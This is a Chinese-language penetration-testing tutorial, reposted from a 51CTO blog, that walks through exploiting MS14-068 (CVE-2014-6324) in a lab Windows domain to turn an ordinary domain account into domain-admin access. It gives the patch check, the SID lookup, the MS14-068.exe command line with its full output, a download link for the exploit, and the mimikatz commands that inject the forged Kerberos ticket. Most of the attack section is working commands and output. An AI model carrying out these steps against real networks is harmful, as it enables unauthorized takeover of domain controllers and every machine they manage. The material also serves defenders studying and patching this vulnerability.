0x00 前言
在做***测试时,当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。
0x01 准备工作
- 域成员账号及密码一个
- mimikatz
- ms14-068.exe
- 03以上服务器或pc
0x02 模拟环境
域控制器 2008r2 dc.test.com 192.168.3.100
域内机器 2008r2 client.test.com 192.168.3.10
0x03 漏洞自检
MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测
systeminfo |find "3011780"
为空则代表没有打该补丁,存在漏洞!
如果属于黑盒测试,并没有直接操作域控制器的权限,那么只能使用该漏洞,看是否能成功伪造域管理员登录来验证
0x04 漏洞利用
1. 获取域成员sid
获取域成员sid的方式有多种,当然前提是建立在0x01上,本次使用最为简单的命令获取
whoami /all #该命令获取当前登录用户的信息,这里使用的是域成员登录,所以获取到的是域成员normal的sid
2. 生成TGT票据
使用ms14-068.exe,网上有多种版本,有python脚本(需要在***机上安装python2.x版本,略麻烦),也有已经从python转exe的版本,不需要依赖python环境,下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
C:\Users\normal\Desktop>MS14-068.exe
USAGE:
MS14-068.exe -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
OPTIONS:
-p <clearPassword>
--rc4 <ntlmHash>
C:\Users\normal\Desktop>MS14-068.exe -u normal@test.com -s S-1-5-21-1406004368-3
818689962-3591297438-1105 -d 192.168.3.100 -p Server1
[+] Building AS-REQ for 192.168.3.100... Done!
[+] Sending AS-REQ to 192.168.3.100... Done!
[+] Receiving AS-REP from 192.168.3.100... Done!
[+] Parsing AS-REP from 192.168.3.100... Done!
[+] Building TGS-REQ for 192.168.3.100... Done!
[+] Sending TGS-REQ to 192.168.3.100... Done!
[+] Receiving TGS-REP from 192.168.3.100... Done!
[+] Parsing TGS-REP from 192.168.3.100... Done!
[+] Creating ccache file 'TGT_normal@test.com.ccache'... Done!
使用方法:
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
如果操作正确,且域机器是可以和域控制器互通则会创建.ccache文件
域成员密码错误情况图
3. 票据注入
使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器
mimikatz # kerberos::purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件 //将票据注入到内存中
当显示injecting ticket ok时,表示已经成功将票据注入到内存中,可在机器中用klist查看
4.测试
伪造后,进行尝试访问域控制器
注入票据前是不能访问的
0x05 细节
-
注入票据时,机器不能是03或xp,因为mimikatz不支持这两个机器注入,听大佬说过有工具可以注入,希望有知道的朋友可以留言
- 当获取到域用户、域用户sid、密码以及可访问到域控制器的机器,并不需要机器一定在域中(如***者通过***等拨入内网),但需要把dns指向域控制器才能解析
- 访问域控制器时,需要使用主机名,不能使用ip
- 如有错误,请指正,万分感谢
来源:51CTO
作者:z2pp
链接:https://blog.51cto.com/z2ppp/2060051